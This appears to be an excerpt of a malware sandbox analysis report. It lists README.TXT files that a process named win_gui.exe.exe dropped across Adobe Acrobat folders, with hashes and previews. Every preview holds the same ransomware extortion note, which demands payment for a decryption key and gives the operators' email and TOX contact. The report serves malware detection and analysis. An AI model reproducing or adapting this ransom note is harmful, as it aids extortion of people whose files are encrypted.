                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer-select\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-computer\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files-select\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\css\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\images\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:false
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\uk-ua\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:true
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-cn\README.TXT

                                Download File
                                Process:C:\Users\user\Desktop\win_gui.exe.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1440
                                Entropy (8bit):4.9726392336966
                                Encrypted:false
                                SSDEEP:24:Lpu8yOUZVJkIWFeiQLXiZXtXyZ2kH6t+k+WRKdaTZVE9cBp1LW:LpCOUzJk8Vbslc27t+mKMdq5
                                MD5:26BC5681FEB410FE72232CBC4B8ADB91
                                SHA1:6DAAA573AF83C46428EB318F6EB041A9E177202C
                                SHA-256:1D05751ECF9D1C3C61E92C897DCB7A1390B7CC67B16591AA4C65F73FE3B9D9D7
                                SHA-512:BBB7E290730349A0FDBD548F6C76F0F15B87DCF2B11CDF62ADC0558052CC6B94A35AAC58B65E198D7C32043FFAAC3A5AACD50CC6D81A198DADBB17B5DD4D8AC8
                                Malicious:true
                                Preview:YOUR FILES ARE ENCRYPTED....Your files, documents, photos, databases and other important files are encrypted.....You are not able to decrypt it by yourself! The only method of recovering files is to purchase an unique private key...Only we can give you this key and only we can recover your files.....To be sure we have the decryptor and it works you can send an email: buybackme@mail2tor.com and decrypt one file for free...But this file should be of not valuable!......Do you really want to restore your files?..Write to email: buybackme@mail2tor.com..TOX: 140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A....How to use tox:.. 1. Download a uTox client: http://utox.org.. 2. Run it.. 3. Add our TOX id: ..140B031C8626B9CA006ABA41EBD8D092FE8D0FA71279CD0D42AA63ADACF60609171047565C7A......Attention!.. * Do not rename encrypted files... * Do not try to decrypt your data using third party software, it may cause permanent data loss... * Decryption of your files with the h

                                C:\Program Files\Adobe\Acrobat DC\Acrobat\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\README.TXT

